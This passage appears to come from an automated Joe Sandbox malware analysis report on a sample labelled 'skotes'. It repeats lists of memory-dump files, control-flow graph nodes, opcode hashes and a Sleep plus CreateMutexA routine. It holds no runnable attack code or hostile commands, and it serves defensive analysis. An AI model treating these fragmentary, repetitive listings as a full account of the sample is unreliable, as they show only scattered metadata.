                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226252851.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226275489.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226294618.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226315018.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226331084.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226352626.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226368505.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226384464.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226400933.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226416513.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226434118.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226455642.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226478790.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226571879.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226593603.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226611832.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226611832.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226656798.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226675931.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226690703.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226706831.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226722414.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226740940.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226757505.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID: T2M
                                                                                                                                                                                                                                                  • API String ID: 1464230837-1911109154
                                                                                                                                                                                                                                                  • Opcode ID: 223048798cb4c86f50d0556252bc19479861d25b95800bd8f1c847374a0063cb
                                                                                                                                                                                                                                                  • Instruction ID: ee1a64f18b0f08087bf60114bbeabf4ba5cb6fc34538389b28ec0bc2200d76d3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 223048798cb4c86f50d0556252bc19479861d25b95800bd8f1c847374a0063cb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E314771B001009BEB18AB78DD8DBADB762DBC6314F24861AE018973D6D77E8990871A

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 164 47a54d-47a56d 168 47a56f-47a57b 164->168 169 47a59b-47a5b7 164->169 172 47a591-47a598 call 48d663 168->172 173 47a57d-47a58b 168->173 170 47a5e5-47a604 169->170 171 47a5b9-47a5c5 169->171 176 47a606-47a612 170->176 177 47a632-47a916 call 4880c0 170->177 174 47a5c7-47a5d5 171->174 175 47a5db-47a5e2 call 48d663 171->175 172->169 173->172 178 47a944-47a949 call 4a6c6a 173->178 174->175 174->178 175->170 182 47a614-47a622 176->182 183 47a628-47a62f call 48d663 176->183 191 47a94e-47a994 call 4a6c6a Sleep CreateMutexA 178->191 192 47a949 call 4a6c6a 178->192 182->178 182->183 183->177 198 47a9a7-47a9a8 191->198 199 47a996-47a998 191->199 192->191 199->198 200 47a99a-47a9a5 199->200 200->198
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00000064), ref: 0047A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,004D3254), ref: 0047A981
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2224996195.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2224670067.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2224996195.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225159080.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225176441.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225279090.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225572927.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225657582.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225758100.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225783831.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225840476.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225840476.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225942676.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225988723.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226005704.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226022713.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226039783.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226056811.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226077921.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226094470.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226109889.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226125265.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226140557.0000000000699000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226154213.000000000069A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226170008.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226194580.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226211891.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226230667.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226252851.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226275489.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226294618.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226315018.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226331084.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226352626.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226368505.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226384464.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226400933.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226416513.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226434118.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226455642.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226478790.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226571879.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226593603.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226611832.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226611832.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226656798.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226675931.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226690703.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226706831.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226722414.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226740940.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226757505.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID: T2M
                                                                                                                                                                                                                                                  • API String ID: 1464230837-1911109154
                                                                                                                                                                                                                                                  • Opcode ID: c117f950342a46b3f9bca3776b87404115cd40664f35952cdf91ab7981335abf
                                                                                                                                                                                                                                                  • Instruction ID: 25fa2970f7b20cf40dbc2386bbb36ca4846abff3b0440f997960a23fff22b47a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c117f950342a46b3f9bca3776b87404115cd40664f35952cdf91ab7981335abf
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F6312971B011019BEB18DB78DD8DBADB762DBC6314F24C61AE058973D2C77D89A0871A

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 202 47a682-47a6a2 206 47a6a4-47a6b0 202->206 207 47a6d0-47a6ec 202->207 208 47a6c6-47a6cd call 48d663 206->208 209 47a6b2-47a6c0 206->209 210 47a6ee-47a6fa 207->210 211 47a71a-47a739 207->211 208->207 209->208 214 47a949 209->214 216 47a710-47a717 call 48d663 210->216 217 47a6fc-47a70a 210->217 212 47a767-47a916 call 4880c0 211->212 213 47a73b-47a747 211->213 218 47a75d-47a764 call 48d663 213->218 219 47a749-47a757 213->219 220 47a94e-47a994 call 4a6c6a Sleep CreateMutexA 214->220 221 47a949 call 4a6c6a 214->221 216->211 217->214 217->216 218->212 219->214 219->218 234 47a9a7-47a9a8 220->234 235 47a996-47a998 220->235 221->220 235->234 236 47a99a-47a9a5 235->236 236->234
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00000064), ref: 0047A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,004D3254), ref: 0047A981
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2224996195.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2224670067.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2224996195.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225159080.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225176441.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225279090.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225572927.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225657582.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225758100.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225783831.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225840476.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225840476.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225942676.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225988723.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226005704.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226022713.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226039783.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226056811.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226077921.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226094470.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226109889.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226125265.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226140557.0000000000699000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226154213.000000000069A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226170008.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226194580.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226211891.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226230667.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226252851.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226275489.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226294618.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226315018.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226331084.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226352626.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226368505.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226384464.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226400933.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226416513.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226434118.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226455642.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226478790.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226571879.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226593603.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226611832.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226611832.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226656798.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226675931.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226690703.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226706831.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226722414.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226740940.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226757505.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID: T2M
                                                                                                                                                                                                                                                  • API String ID: 1464230837-1911109154
                                                                                                                                                                                                                                                  • Opcode ID: f586ef2b5dff3ce35142fe500c96b535c3839f71b66d4540616bf3d33c105ffb
                                                                                                                                                                                                                                                  • Instruction ID: c3b3aedd603a3a7de8327f596419c211ed8c6b04548dacb44f9358d860243cdd
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f586ef2b5dff3ce35142fe500c96b535c3839f71b66d4540616bf3d33c105ffb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 90311771A012008BEB18DB78DD89BADB762DBC6314F24C61AE058973D1C77D8990875A

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 238 479adc-479ae8 239 479afe-479d91 call 48d663 call 487a00 call 475c10 call 478b30 call 488220 call 487a00 call 475c10 call 478b30 call 488220 238->239 240 479aea-479af8 238->240 240->239 241 47a917 240->241 243 47a953-47a994 Sleep CreateMutexA 241->243 244 47a917 call 4a6c6a 241->244 249 47a9a7-47a9a8 243->249 250 47a996-47a998 243->250 244->243 250->249 252 47a99a-47a9a5 250->252 252->249
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00000064), ref: 0047A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,004D3254), ref: 0047A981
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2224996195.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2224670067.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2224996195.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225159080.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225176441.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225279090.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225572927.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225657582.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225758100.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225783831.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225840476.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225840476.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225942676.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225988723.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226005704.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226022713.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226039783.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226056811.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226077921.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226094470.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226109889.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226125265.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226140557.0000000000699000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226154213.000000000069A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226170008.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226194580.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226211891.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226230667.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226252851.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226275489.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226294618.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226315018.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226331084.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226352626.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226368505.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226384464.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226400933.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226416513.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226434118.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226455642.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226478790.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226571879.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226593603.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226611832.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226611832.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226656798.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
